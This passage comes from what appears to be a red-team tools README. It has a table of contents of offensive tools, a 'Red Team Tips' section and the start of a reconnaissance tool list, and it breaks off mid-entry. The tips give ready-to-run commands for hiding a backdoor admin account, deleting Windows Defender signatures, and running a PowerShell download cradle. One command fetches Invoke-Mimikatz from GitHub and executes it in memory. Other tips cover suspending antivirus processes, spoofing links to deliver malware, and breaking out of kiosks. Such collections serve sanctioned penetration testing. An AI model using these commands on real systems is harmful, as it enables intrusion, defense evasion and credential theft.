parsing\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#mailsniper\"\u003eMailSniper\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Microsoft Exchange Mail Searcher\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#sharpchromium\"\u003eSharpChromium\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Cookie, history and saved login chromium extractor\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#dploot\"\u003edploot\u003c/a\u003e\u003c/b\u003e\u003ci\u003e DPAPI looting remotely in Python\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n \u003csummary\u003e\u003cb\u003eDiscovery\u003c/b\u003e 6 tools\u003c/summary\u003e\n \u003cul\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#pcredz\"\u003ePCredz\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Credential discovery PCAP/live interface\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#pingcastle\"\u003ePingCastle\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory assessor\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#seatbelt\"\u003eSeatbelt\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Local vulnerability scanner\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#adrecon\"\u003eADRecon\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory recon\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#adidnsdump\"\u003eadidnsdump\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active Directory Integrated DNS dumping\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#scavenger\"\u003escavenger\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Scanning tool for scavenging systems\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n \u003csummary\u003e\u003cb\u003eLateral Movement\u003c/b\u003e 12 tools\u003c/summary\u003e\n \u003cul\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#crackmapexec\"\u003ecrackmapexec\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows/Active directory lateral movement toolkit\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#wmiops\"\u003eWMIOps\u003c/a\u003e\u003c/b\u003e\u003ci\u003e WMI remote commands\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#powerlessshell\"\u003ePowerLessShell\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Remote PowerShell without PowerShell\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#psexec\"\u003ePsExec\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Light-weight telnet-replacement\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#liquidsnake\"\u003eLiquidSnake\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Fileless lateral movement\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#enabling-rdp\"\u003eEnabling RDP\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Windows RDP enable command\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#upgrading-shell-to-meterpreter\"\u003eUpgrading shell to meterpreter\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Reverse shell improvement\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#forwarding-ports\"\u003eForwarding Ports\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Local port forward command\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#jenkins-reverse-shell\"\u003eJenkins reverse shell\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Jenkins shell command\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#adfspoof\"\u003eADFSpoof\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Forge AD FS security tokens\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#kerbrute\"\u003ekerbrute\u003c/a\u003e\u003c/b\u003e\u003ci\u003e A tool to perform Kerberos pre-auth bruteforcing\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#coercer\"\u003eCoercer\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Coerce a Windows server to authenticate\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#wmiops\"\u003eWMIOps\u003c/a\u003e\u003c/b\u003e\u003ci\u003e WMI remote commands\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n \u003csummary\u003e\u003cb\u003eCollection\u003c/b\u003e 3 tools\u003c/summary\u003e\n \u003cul\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#bloodhound\"\u003eBloodHound\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory visualisation\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#snaffler\"\u003eSnaffler\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active directory credential collector\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#linwinpwn\"\u003elinWinPwn\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Active Directory Enumeration and Vulnerability checks\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n \u003csummary\u003e\u003cb\u003eCommand and Control\u003c/b\u003e 9 tools\u003c/summary\u003e\n \u003cul\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#living-off-trusted-sites-project\"\u003eLiving Off Trusted Sites Project\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Leverage legitimate domains for your C2\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#havoc\"\u003eHavoc\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#covenant\"\u003eCovenant\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework (.NET)\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#merlin\"\u003eMerlin\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework (Golang)\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#metasploit-framework\"\u003eMetasploit Framework\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework (Ruby)\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#pupy\"\u003ePupy\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework (Python)\u003c/i\u003e\u003c/li\u003e\n \t \u003cli\u003e\u003cb\u003e\u003ca href=\"#brute-ratel\"\u003eBrute Ratel\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Command and control framework ($$$)\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#nimplant\"\u003eNimPlant\u003c/a\u003e\u003c/b\u003e\u003ci\u003e C2 implant written in Nim\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#hoaxshell\"\u003eHoaxshell\u003c/a\u003e\u003c/b\u003e\u003ci\u003e PowerShell reverse shell\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n \u003csummary\u003e\u003cb\u003eExfiltration\u003c/b\u003e 5 tools\u003c/summary\u003e\n \u003cul\u003e\n \u003cul\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#dnscat2\"\u003eDnscat2\u003c/a\u003e\u003c/b\u003e\u003ci\u003e C2 via DNS tunneling\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#cloakify\"\u003eCloakify\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Data transformation for exfiltration\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#pyexfil\"\u003ePyExfil\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Data exfiltration PoC\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#powershell-rat\"\u003ePowershell RAT\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Python based backdoor\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#gd-thief\"\u003eGD-Thief\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Google drive exfiltration\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\n\u003cdetails open\u003e\n \u003csummary\u003e\u003cb\u003eImpact\u003c/b\u003e 4 tools\u003c/summary\u003e\n \u003cul\u003e\n \u003cul\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#conti-pentester-guide-leak\"\u003eConti Pentester Guide Leak\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Conti ransomware group affilate toolkit\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#slowloris\"\u003eSlowLoris\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Simple denial of service\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#usbkill\"\u003eusbkill\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Anti-forensic kill-switch\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#keytap\"\u003eKeytap\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Get pressed keyboard keys from typing audio\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n \nRed Team Tips\n====================\n\n*Learn from Red Teamers with a collection of Red Teaming Tips. These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.*\n\n### [πŸ”™](#tool-list)Improved HTML smuggling with mouse move eventlistener\n\n**Description:** *'Qakbot added an EventListener for mouse movement to the HTML smuggling attachment for anti evasion in sandbox's the zip wont drop.'*\n\n**Credit:** [@pr0xylife](https://x.com/pr0xylife)\n\n**Link:** [Twitter](https://x.com/pr0xylife/status/1598410732516802563)\n\n### [πŸ”™](#tool-list)Google translate for phishing\n\n**Description:** *Successful phishing page credential stealing being proxied via the google translate page view functionality.*\n\n**Credit:** [@malmoeb](https://x.com/malmoeb)\n\n**Link:** [Twitter](https://x.com/malmoeb/status/1671106885590630400)\n\n### [πŸ”™](#tool-list)Hiding the local admin account\n\n```bash\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /t REG_DWORD /v alh4zr3d /d 0 /f\n```\n\n**Description:** *'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1612913838999113728)\n\n### [πŸ”™](#tool-list)Cripple windows defender by deleting signatures\n\n```bash\n\"%Program Files%\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All\n```\n\n**Description:** *'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1611005101262389250)\n\n### [πŸ”™](#tool-list)Enable multiple RDP sessions per user\n\n```bash\nreg add HKLM\\System\\CurrentControlSet\\Control\\TerminalServer /v fSingleSessionPerUser /d 0 /f\n```\n\n**Description:** *'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1609954528425558016)\n\n### [πŸ”™](#tool-list)Sysinternals PsExec.exe local alternative\n\n```bash\nwmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c \" command \"\n```\n\n**Description:** *'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'*\n\n**Credit:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)\n\n**Link:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1607473627922063360)\n\n### [πŸ”™](#tool-list)Live off the land port scanner\n\n```bash\n0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(\u003ctgt_ip\u003e,$_)) \"Port $_ open\"} 2\u003e$null\n```\n\n**Description:** *'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell/.NET help. Ex: simple port scanner in Powershell.'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1605060950339588096)\n\n### [πŸ”™](#tool-list)Proxy aware PowerShell DownloadString\n\n```bash\n$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString(\"\u003curl\u003e\")\n```\n\n**Description:** *'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. Use this one.'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1596192664398966785)\n\n### [πŸ”™](#tool-list)Looking for internal endpoints in browser bookmarks\n\n```bash\ntype \"C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks.bak\" | findstr /c \"name url\" | findstr /v \"type\"\n```\n\n**Description:** *'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1595488676389171200)\n\n### [πŸ”™](#tool-list)Query DNS records for enumeration\n\n```bash\nGet-DnsRecord -RecordType A -ZoneName FQDN -Server \u003cserver hostname\u003e\n```\n\n**Description:** *'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC/DNS server for all DNS records?'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1587132627823181824)\n\n### [πŸ”™](#tool-list)Unquoted service paths without PowerUp\n\n```bash\nGet-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq \"Auto\" -and $_.PathName -notlike \"C:\\Windows*\" -and $_.PathName -notlike '\"*'} | select PathName,DisplayName,Name\n```\n\n**Description:** *'Finding unquoted service paths without PowerUp'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/Alh4zr3d/status/1579254955554136064)\n\n### [πŸ”™](#tool-list)Bypass a disabled command prompt with /k\n\n```bash\n# Win+R (To bring up Run Box)\ncmd.exe /k \"whoami\"\n```\n\n**Description:** *'This command prompt has been disabled by your administrator...' Can usually be seen in environments such as kiosks PCs, a quick hacky work around is to use /k via the windows run box. This will carry out the command and then show the restriction message, allowing for command execution.*\n\n**Credit:** Martin Sohn Christensen\n\n**Link:** [Blog](https://improsec.com/tech-blog/the-command-prompt-has-been-disabled-by-your-administrator-press-any-key-to-continue-or-use-these-weird-tricks-to-bypass-admins-will-hate-you)\n\n### [πŸ”™](#tool-list)Stop windows defender deleting mimikatz.exe\n\n```bash\n(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv\n```\n\n**Description:** *'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'*\n\n**Credit:** [@GuhnooPlusLinux](https://twitter.com/GuhnooPlusLinux)\n\n**Link:** [Twitter](https://twitter.com/GuhnooPlusLinux/status/1605629049660809216)\n\n### [πŸ”™](#tool-list)Check if you are in a virtual machine\n\n```bash\nreg query HKLM\\SYSTEM /s | findstr /S \"VirtualBox VBOX VMWare\"\n```\n\n**Description:** *'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'*\n\n**Credit:** [@dmcxblue](https://twitter.com/dmcxblue)\n\n**Link:** [Twitter](https://twitter.com/dmcxblue/status/1366779034672136194)\n\n### [πŸ”™](#tool-list)Enumerate AppLocker rules\n\n```\n(Get-AppLockerPolicy -Local).RuleCollections\n\nGet-ChildItem -Path HKLM:Software\\Policies\\Microsoft\\Windows\\SrpV2 -Recurse\n\nreg query HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\SrpV2\\Exe\\\n```\n\n**Description:** *'AppLocker can be a pain. Enumerate to see how painful'*\n\n**Credit:** [@Alh4zr3d](https://twitter.com/Alh4zr3d)\n\n**Link:** [Twitter](https://twitter.com/alh4zr3d/status/1614706476412698624)\n\n### [πŸ”™](#tool-list)CMD shortcut with 6 pixels via mspaint\n\n![image](https://user-images.githubusercontent.com/100603074/223849011-24db49d7-37b0-4dad-a7a6-db046f6cb7da.png)\n\n1. Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels\n2. Zoom in to make the following tasks easier\n3. Using the colour picker, set pixels values to (from left to right):\n - 1st: R: 10, G: 0, B: 0\n - 2nd: R: 13, G: 10, B: 13\n - 3rd: R: 100, G: 109, B: 99\n - 4th: R: 120, G: 101, B: 46\n - 5th: R: 0, G: 0, B: 101\n - 6th: R: 0, G: 0, B: 0\n4. Save it as 24-bit Bitmap (*.bmp;*.dib)\n5. Change its extension from bmp to bat and run.\n\n**Description:** *'An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.'*\n\n**Credit:** [PenTestPartners](https://www.pentestpartners.com/)\n\n**Link:** [Blog](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/#gainingacommandshell)\n\n### [πŸ”™](#tool-list)Link spoofing with PreventDefault JavaScript method\n\n![image](https://user-images.githubusercontent.com/100603074/223849419-c65fec83-ca1c-4a20-ac06-ec2de537a748.png)\n\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n \u003chead\u003e\n \u003cmeta charset=\"UTF-8\"\u003e\n \u003ctitle\u003ePreventDefault Example\u003c/title\u003e\n \u003c/head\u003e\n \u003cbody\u003e\n \u003ca href=\"https://google.com\" onclick=\"event.preventDefault(); window.location.href = 'https://bing.com';\"\u003eGo to Google\u003c/a\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n```\n\n**Description:** *Threat actors have been observed using this technique to trick victims into clicking spoofed in-page malware download links. Using the PreventDefault JavaScript method you can spoof the hover link to display a legit link `google.com`, but once clicked the victim will be redirected to your malicious link `bing.com`. Great for getting victims to download payloads via a controlled site.*\n\n**Link:** [PreventDefault Docs](https://developer.mozilla.org/en-US/docs/Web/API/Event/preventDefault)\n\n### [πŸ”™](#tool-list)Check SMB firewall rules with Responder\n\n![image](https://user-images.githubusercontent.com/100603074/229650380-b651cfc4-896f-4429-b7b4-54d1241a5b39.png)\n\n```powershell\nCopy-Item -Path \"C:\\tmp\\\" -Destination \"\\\\\u003cip_running_responder\u003e\\c$\"\n```\n\n**Description:** *'When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: `Copy-Item -Path \"C:\\tmp\\\" -Destination \"\\\\\u003cip_running_responder\u003e\\c$\"`. If Responder could capture the hash, the firewall allows outgoing SMB connections'*\n\n**Credit:** [@malmoeb](https://twitter.com/malmoeb)\n\n**Link:** [Twitter](https://twitter.com/malmoeb/status/1628272928855826433)\n\n### [πŸ”™](#tool-list)Disable AV with SysInternals PsSuspend\n\n![image](https://github.com/A-poc/RedTeam-Tools/assets/100603074/4519f5ad-c177-4550-b9af-238fa73ad66e)\n\n**Description:** *Using the Microsoft Sysinternals tool PsSuspend.exe it's possible to suspend some AV service executables. The Microsoft signed tool can be passed the PID or Name of a running service, it will suspend the process via the NtSuspendProcess Windows API.*\n\n**Related Blog Post:** [Bypassing AV via Process Suspension with PsSuspend.exe](https://medium.com/@a-poc/process-suspension-with-pssuspend-exe-0cdf5d16a3b7)\n\n**Link:** [Twitter](https://twitter.com/0gtweet/status/1638069413717975046)\n\nReconnaissance\n====================\n\n### [πŸ”™](#tool-list)[spiderfoot](https://github.com/smicallef/spiderfoot)\n\nSpiderFoot is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate.\n\nSpiderFoot can be used offensively (e.g. in a red team exercise or penetration test) for reconnaissance of your target or defensively to gather information about what you or your organisation might have exposed over the Internet.\n\n**Install:** \n\n```bash\nwget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz\ntar zxvf v4.0.tar.gz\ncd spiderfoot-4.0\npip3 install -r requirements.txt\n```\n\nFor full installation instructions see [here](https://github.com/smicallef/spiderfoot?tab=readme-ov-file#installing--running).\n\n**Usage:** \n\n```python\npython3 ./sf.py -l 127.0.0.1:5001\n```\n\nLots of usage tutorial videos [here](https://asciinema.org/~spiderfoot)\n\n![spiderfoot](https://github.com/user-attachments/assets/1ce26a9e-6fa5-4987-9aea-4943b9c2efec)\n\n*Image used from https://github.com/smicallef/spiderfoot*\n\n### [πŸ”™](#tool-list)[reconftw](https://github.com/six2dez/reconftw)\n\nreconFTW automates the entire process of reconnaissance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target.\n\n**Install:** \n\n```bash\ngit clone https://github.com/six2dez/reconftw.git;cd reconftw/;./install.sh\n```\n\nFor full installation instructions see [here](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide).\n\n**Usage:** \n\n```bash\n# Single target domain\n./reconftw.sh -d target.com -r\n\n# One target with multiple domains\n./reconftw.sh -m target -l domains.txt -r\n\n# Passive recon\n./reconftw.sh -d target.com -p\n\n# Perform all checks and exploitations\n./reconftw.sh -d target.com -a\n```\n\nFor full usage instructions see [here](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide).\n\n![reconftw](https://github.com/user-attachments/assets/1a5abeb5-776d-4c10-a02c-934e1662d817)\n\n*Image used from https://www.youtube.com/watch?v=TQmDAtkD1Wo*\n\n### [πŸ”™](#tool-list)[subzy](https://github.com/PentestPad/subzy)\n\nSubdomain takeover tool which works based on matching response fingerprints from [can-i-take-over-xyz](https://github.com/EdOverflow/can-i-take-over-xyz/blob/master/README.md).\n\n**Install:** \n\n```bash\ngo install -v github.com/PentestPad/subzy@latest\n```\n\nFor full installation instructions see [here](https://github.com/PentestPad/subzy?tab=readme-ov-file#installation).\n\n**Usage:** \n\n```bash\n# List of subdomains\n./subzy run --targets list.txt\n\n# Single or multiple targets\n./subzy run --target test.google.com\n./subzy run --target test.google.com,https://test.yahoo.com\n```\n\n![subzy](https://github.com/user-attachments/assets/d06bff41-8c0f-4d3d-b42e-1221b9866332)\n\n*Image used from https://www.geeksforgeeks.org/subzy-subdomain-takeover-vulnerability-checker-tool/*\n\n### [πŸ”™](#tool-list)[smtp-user-enum](https://github.com/cytopia/smtp-user-enum)\n\nSMTP user enumeration via VRFY, EXPN and RCPT with clever timeout, retry and reconnect functionality.\n\n**Install:** \n\n```bash\npip install smtp-user-enum\n```\n\n**Usage:** \n\n```bash\nsmtp-user-enum [options] -u/-U host port\nsmtp-user-enum --help\nsmtp-user-enum --version\n```\n\n![smtp-user-enum](https://github.com/user-attachments/assets/2a965690-52f3-412a-90e3-54dd69e0b275)\n\n*Image used from https://www.kali.org/tools/smtp-user-enum/*\n\n### [πŸ”™](#tool-list)crt.sh -\u003e httprobe -\u003e EyeWitness\n\nI have put together a bash one-liner that: \n- Passively collects a list of subdomains from certificate associations ([crt.sh](https://crt.sh/))\n- Actively requests each subdomain to verify it's existence ([httprobe](https://github.com/tomnomnom/httprobe))\n- Actively screenshots each subdomain for manual review ([EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness))\n\n**Usage:** \n\n```bash\ndomain=DOMAIN_COM;rand=$RANDOM;curl -fsSL \"https://crt.sh/?q=${domain}\" | pup 'td text{}' | grep \"${domain}\" | sort -n | uniq | httprobe \u003e /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web\n```\n\n*Note: You must have [httprobe](https://github.com/tomnomnom/httprobe), [pup](https://github.com/EricChiang/pup) and [EyeWitness](https://github.com/FortyNorthSecurity/EyeWitness) installed and change 'DOMAIN_COM' to the target domain. You are able to run this script concurrently in terminal windows if you have multiple target root domains*\n\n![image](https://user-images.githubusercontent.com/100603074/192104474-5836138a-4a61-44fd-b3e3-b2a908c2928e.png)\n\n![image](https://user-images.githubusercontent.com/100603074/192104501-e038aff8-1e51-4cc3-a286-54e93408ed4e.png)\n\n### [πŸ”™](#tool-list)[jsendpoints](https://twitter.com/renniepak/status/1602620834463588352)\n\nA JavaScript bookmarklet for extracting all webpage endpoint links on a page.\n\nCreated by [@renniepak](https://twitter.com/renniepak), this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage.\n\n```javascript\njavascript:(function(){var scripts=document.getElementsByTagName(\"script\"),regex=/(?\u003c=(\\\"|\\'|\\`))\\/[a-zA-Z0-9_?\u0026=\\/\\-\\#\\.]*(?=(\\\"|\\'|\\`))/g;const results=new Set;for(var i=0;i\u003cscripts.length;i++){var t=scripts[i].src;\"\"!=t\u0026\u0026fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log(\"An error occurred: \",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+\"\u003cbr\u003e\")})}setTimeout(writeResults,3e3);})();\n```\n\n**Usage (Bookmarklet)** \n\nCreate a bookmarklet...\n\n- `Right click your bookmark bar`\n- `Click 'Add Page'`\n- `Paste the above Javascript in the 'url' box`\n- `Click 'Save'`\n\n...then visit the victim page in the browser and click the bookmarklet.\n\n![image](https://user-images.githubusercontent.com/100603074/207563211-6c69711a-f7e7-4451-862b-80c9849df7fe.png)\n\n**Usage (Console)** \n\nPaste the above Javascript into the console window `F12` and press enter. \n\n![image](https://user-images.githubusercontent.com/100603074/207563598-d70171b5-823e-491e-a6d5-8657af28b0e5.png)\n\n### [πŸ”™](#tool-list)[nuclei](https://github.com/projectdiscovery/nuclei)\n\nFast vulnerability scanner that uses .yaml templates to search for specific issues.\n\n**Install:** \n\n```bash\ngo install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest\n```\n\n**Usage:** \n\n```bash\ncat domains.txt | nuclei -t /PATH/nuclei-templates/\n```\n\n![image](https://user-images.githubusercontent.com/100603074/205439027-2afe4ef8-fc7a-410d-934f-f8d325a8176e.png)\n\n### [πŸ”™](#tool-list)[certSniff](https://github.com/A-poc/certSniff)\n\ncertSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords, defined in a file.\n\nYou can set this running with several keywords relating to your victim domain, any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.\n\n**Install:** \n\n```bash\ngit clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt\n```\n\n**Usage:** \n\n```python\npython3 certSniff.py -f example.txt\n```\n\n![image](https://user-images.githubusercontent.com/100603074/223851512-068261fa-7070-4307-852c-7ef46d938b18.png)\n\n### [πŸ”™](#tool-list)[gobuster](https://www.kali.org/tools/gobuster/)\n\nNice tool for brute forcing file/folder paths on a victim website.\n\n**Install:** \n\n```bash\nsudo apt install gobuster\n```\n\n**Usage:** \n\n```bash\ngobuster dir -u \"https://google.com\" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20\n```\n\n![image](https://user-images.githubusercontent.com/100603074/192146594-86f04a85-fce3-4c4c-bcd6-2bf6a6222241.png)\n\n### [πŸ”™](#tool-list)[feroxbuster](https://github.com/epi052/feroxbuster)\n\nA tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.\n\nFeroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc...\n\n**Install: (Kali)** 